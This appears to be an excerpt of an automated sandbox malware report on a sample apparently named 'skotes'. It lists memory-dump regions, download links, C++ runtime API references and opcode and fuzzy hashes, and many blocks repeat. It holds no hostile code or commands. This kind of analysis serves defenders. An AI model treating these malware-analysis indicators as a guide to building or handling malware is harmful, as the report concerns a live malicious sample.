                                                          • Associated: 00000006.00000002.2680797474.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680822841.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681757009.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681801830.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681834666.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681856278.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681883007.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681883007.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681947828.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681971967.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682002825.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682032299.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682056125.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682146225.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682667892.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682717847.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683732040.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683784418.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683811997.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683848149.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683876756.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683898524.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683921446.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683943913.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683967721.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683989544.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684012086.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684035267.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684065002.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684095310.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684120262.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684145634.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684145634.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684228696.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684252362.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684279870.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684300666.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684326349.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685567728.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685629752.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685676912.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685709596.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_be0000_skotes.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Concurrency::details::$Context$Base::Internal$ChoreWork$AssociatedCancelCleanupCompletionCreateCurrentDispatchedExecuteExecutedFoundInlineListThreadWait
                                                          • String ID:
                                                          • API String ID: 2885714658-0
                                                          • Opcode ID: f70daf509a1a602181f8660190030b16e4ebe0724a9e96a05488c765c8b74374
                                                          • Instruction ID: 47bf4afa48ae5a96a10ef1d74c660ffde73730ac3ae4972a6fc5a720a108ba7e
                                                          • Opcode Fuzzy Hash: f70daf509a1a602181f8660190030b16e4ebe0724a9e96a05488c765c8b74374
                                                          • Instruction Fuzzy Hash: 0D41AC30A043489BDF18FBE4C4557FD7BA5AF11304F1444A9E9626B2C3DB758E08DB62
                                                          APIs
                                                          • Concurrency::details::InternalContextBase::ReclaimVirtualProcessor.LIBCONCRT ref: 00C0E7D7
                                                            • Part of subcall function 00C0E544: Concurrency::details::VirtualProcessor::Deactivate.LIBCONCRT ref: 00C0E577
                                                            • Part of subcall function 00C0E544: Concurrency::details::VirtualProcessor::Deactivate.LIBCONCRT ref: 00C0E599
                                                          • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00C0E854
                                                          • Concurrency::details::ScheduleGroupSegmentBase::ReleaseInternalContext.LIBCMT ref: 00C0E860
                                                          • Concurrency::details::SchedulerBase::TriggerCommitSafePoints.LIBCMT ref: 00C0E86F
                                                          • Concurrency::details::SchedulerBase::VirtualProcessorActive.LIBCONCRT ref: 00C0E879
                                                          • Concurrency::location::_Assign.LIBCMT ref: 00C0E8AD
                                                          • Concurrency::details::ScheduleGroupSegmentBase::AddRunnableContext.LIBCONCRT ref: 00C0E8B5
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.2680593860.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true
                                                          • Associated: 00000006.00000002.2678989522.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680593860.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680755296.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680797474.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680822841.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681757009.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681801830.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681834666.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681856278.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681883007.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681883007.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681947828.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681971967.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682002825.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682032299.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682056125.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682146225.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682667892.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682717847.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683732040.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683784418.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683811997.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683848149.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683876756.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683898524.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683921446.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683943913.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683967721.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683989544.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684012086.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684035267.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684065002.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684095310.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684120262.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684145634.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684145634.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684228696.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684252362.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684279870.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684300666.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684326349.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685567728.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685629752.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685676912.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685709596.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_be0000_skotes.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Concurrency::details::$Base::$Context$Virtual$DeactivateGroupInternalProcessorProcessor::ScheduleSchedulerSegment$ActiveAssignCommitConcurrency::location::_EventPointsReclaimReleaseRunnableSafeTraceTrigger
                                                          • String ID:
                                                          • API String ID: 1924466884-0
                                                          • Opcode ID: 5bc705dd75af0027a8d441f9f8829a22f66c6016895c10dca395cec8b5b02dd0
                                                          • Instruction ID: 941eb9d87319e5ea1ae731c2b884b07d1aa566c9b667c4b7b2008fc3cf7fd4bf
                                                          • Opcode Fuzzy Hash: 5bc705dd75af0027a8d441f9f8829a22f66c6016895c10dca395cec8b5b02dd0
                                                          • Instruction Fuzzy Hash: A2411875A00208DFCF05EF68C495BADB7B5FF48310F1885A9DD599B382DB30AA41CB91
                                                          APIs
                                                          • __Mtx_unlock.LIBCPMT ref: 00BF6ED1
                                                          • std::_Rethrow_future_exception.LIBCPMT ref: 00BF6F22
                                                          • std::_Rethrow_future_exception.LIBCPMT ref: 00BF6F32
                                                          • __Mtx_unlock.LIBCPMT ref: 00BF6FD5
                                                          • __Mtx_unlock.LIBCPMT ref: 00BF70DB
                                                          • __Mtx_unlock.LIBCPMT ref: 00BF7116
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.2680593860.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true
                                                          • Associated: 00000006.00000002.2678989522.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680593860.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680755296.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680797474.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680822841.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681757009.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681801830.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681834666.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681856278.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681883007.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681883007.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681947828.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681971967.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682002825.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682032299.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682056125.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682146225.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682667892.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682717847.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683732040.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683784418.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683811997.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683848149.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683876756.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683898524.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683921446.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683943913.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683967721.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683989544.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684012086.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684035267.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684065002.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684095310.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684120262.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684145634.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684145634.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684228696.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684252362.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684279870.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684300666.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684326349.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685567728.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685629752.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685676912.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685709596.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_be0000_skotes.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Mtx_unlock$Rethrow_future_exceptionstd::_
                                                          • String ID:
                                                          • API String ID: 1997747980-0
                                                          • Opcode ID: 6442b5288234f578ec54a6ab694a269de0c53522c8a9b825224d6e1bb48c1b9c
                                                          • Instruction ID: 31f0714f0f008eb383bfa7a9e1e6e4f799908af8f5fe490988691045851f412a
                                                          • Opcode Fuzzy Hash: 6442b5288234f578ec54a6ab694a269de0c53522c8a9b825224d6e1bb48c1b9c
                                                          • Instruction Fuzzy Hash: CCC1BE7190424D9BDB20DFB4C945BBABBF4EF05310F0045ADEA16A7691EB31AA4CCB61
                                                          APIs
                                                          • ListArray.LIBCONCRT ref: 00C04538
                                                          • ListArray.LIBCONCRT ref: 00C0456C
                                                          • Hash.LIBCMT ref: 00C045D5
                                                          • Hash.LIBCMT ref: 00C045E5
                                                            • Part of subcall function 00C09C41: std::bad_exception::bad_exception.LIBCMT ref: 00C09C63
                                                          • Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 00C0474B
                                                          • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00C047A4
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.2680593860.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true
                                                          • Associated: 00000006.00000002.2678989522.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680593860.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680755296.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680797474.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680822841.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681757009.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681801830.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681834666.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681856278.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681883007.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681883007.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681947828.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681971967.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682002825.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682032299.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682056125.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682146225.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682667892.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682717847.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683732040.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683784418.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683811997.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683848149.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683876756.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683898524.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683921446.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683943913.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683967721.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683989544.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684012086.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684035267.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684065002.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684095310.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684120262.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684145634.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684145634.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684228696.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684252362.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684279870.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684300666.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684326349.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685567728.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685629752.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685676912.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685709596.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_be0000_skotes.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ArrayHashList$AsyncConcurrency::details::Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorLibraryLoadRegisterTimerstd::bad_exception::bad_exception
                                                          • String ID:
                                                          • API String ID: 3010677857-0
                                                          • Opcode ID: 08eab51f72c5ab86d854d305bf2dcd17d22c0b901d4f8f21266a8f4d472dbcba
                                                          • Instruction ID: 71d02cc28aa34a345adaa6016d93ea6729b03cbd134eeda6cd36fe8d2ab53c77
                                                          • Opcode Fuzzy Hash: 08eab51f72c5ab86d854d305bf2dcd17d22c0b901d4f8f21266a8f4d472dbcba
                                                          • Instruction Fuzzy Hash: E88160B0A11B66BBD708DF78C445BDAFAA8BF09700F10431AF528D7281DBB4A564DBD1
                                                          APIs
                                                          • __EH_prolog3_GS.LIBCMT ref: 00BFECED
                                                          • Concurrency::details::_NonReentrantPPLLock::_Scoped_lock::_Scoped_lock.LIBCONCRT ref: 00BFED17
                                                            • Part of subcall function 00BFF3DD: Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 00BFF3FA
                                                          • __alloca_probe_16.LIBCMT ref: 00BFED53
                                                          • Concurrency::details::EventWaitNode::Satisfy.LIBCONCRT ref: 00BFED94
                                                          • Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock.LIBCONCRT ref: 00BFEDC6
                                                          • __freea.LIBCMT ref: 00BFEDEC
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.2680593860.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true
                                                          • Associated: 00000006.00000002.2678989522.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680593860.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680755296.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680797474.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680822841.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681757009.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681801830.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681834666.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681856278.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681883007.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681883007.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681947828.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681971967.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682002825.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682032299.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682056125.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682146225.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682667892.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682717847.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683732040.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683784418.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683811997.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683848149.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683876756.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683898524.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683921446.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683943913.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683967721.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
